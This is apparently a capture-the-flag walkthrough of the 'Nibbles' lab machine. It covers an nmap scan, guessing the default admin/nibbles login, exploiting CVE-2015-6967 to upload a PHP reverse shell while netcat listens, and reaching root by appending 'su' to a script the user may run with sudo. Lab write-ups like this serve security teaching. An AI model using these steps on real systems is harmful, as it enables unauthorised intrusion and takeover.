As always, we start with an
nmap against the machine’s IP.
[email protected]:~|⇒ nmap -sC -sV 10.10.10.75 Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 19:04 BST Nmap scan report for 10.10.10.75 Host is up (0.067s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
As you can see there’s an SSH service and Web service running. Head over to the web service wih your browser and you’ll see a ‘hello world’ page.
Inspect the page and theres an HTML comment that mentions ‘/nibbleblog/’, so navigate to that URL; http://10.10.10.75/nibbleblog/
Nibble Blog is a simple blogging web application. Searching for vulnerabilities online, you should come across CVE-2015-6967, but we need a login to be able to perform the exploit. A little more searching and you can easily find the default login page for this app; http://10.10.10.75/nibbleblog/admin.php
Getting the credentials is very easy and just requires a little bit of guess work.
What’s the default admin username for most applications? admin.
What word is used a lot on this machine? nibbles.
Chuck those credentials in to the admin page and you should be logged in to the dashboard.
Nibble Blog Exploit
Details of the exploit can be found on Curesec Research Team’s website. What it does is basically take anything you upload using the My Image plugin and saves it as image.php meaning it’s available for execution from within the browser.
To leverage this exploit, we’ll use pentestmonkey’s PHP Reverse Shell script to get a reverse shell.
Start up netcat with your chosen port to listen on e.g.
nc -lvnp 4447.
Change the IP and Port in the PHP script to match your IP address and the port you’re listening on with Netcat. Save, then navigate to the My Image plugin in the Nibble Blog dashboard and upload. Ignore the errors.
Now to hit the content that’s just been uploading requires a little digging in to the Nibble Blog code, or you could look athe Curesec Research Team’s code snippet to see what’s going on. Basically each plugin appears to get it’s own ‘space’ to store files. This plugin uses that space and saves the file as
image.php. The plugin file storage directory is
/content/private/plugins/my_image/. Add the 2 together and you should hit a page which seems to take forever to load, however check on your netcat and you should see you now have reverse shell! Check the user’s home directory for the first flag,
First we’ll run
sudo -l to see what access to sudo the current user has.
$ sudo -l sudo: unable to resolve host Nibbles: Connection timed out Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
We can see that the user is able to run
/home/nibbler/personal/stuff/monitor.sh as root without a password. So let’s head over there and investigate.
$ cd /home/nibbler $ ls personal.zip user.txt
personal directory, but there’s a zip. Extract the zip and you’ll see that it extract the directories and file that we’re looking for. Execellent.
$ unzip personal.zip Archive: personal.zip creating: personal/ creating: personal/stuff/ inflating: personal/stuff/monitor.sh $ ls personal personal.zip user.txt $ cd personal/stuff
Since we’re able to run this shell script as root, let’s inject a simple
su command, which will switch us to the root user. Use
chmod to set the file as executable and then run it.
>> appends to a file, where’s
> replaces the contents of a file.
$ echo "su" >> monitor.sh $ chmod +x monitor.sh $ sudo /home/nibbler/personal/stuff/monitor.sh sudo: unable to resolve host Nibbles: Connection timed out 'unknown': I need something more specific. /home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found /home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found /home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found ls monitor.sh whoami root
BOOM! We’re now root. Head to the root directory to collect your prize.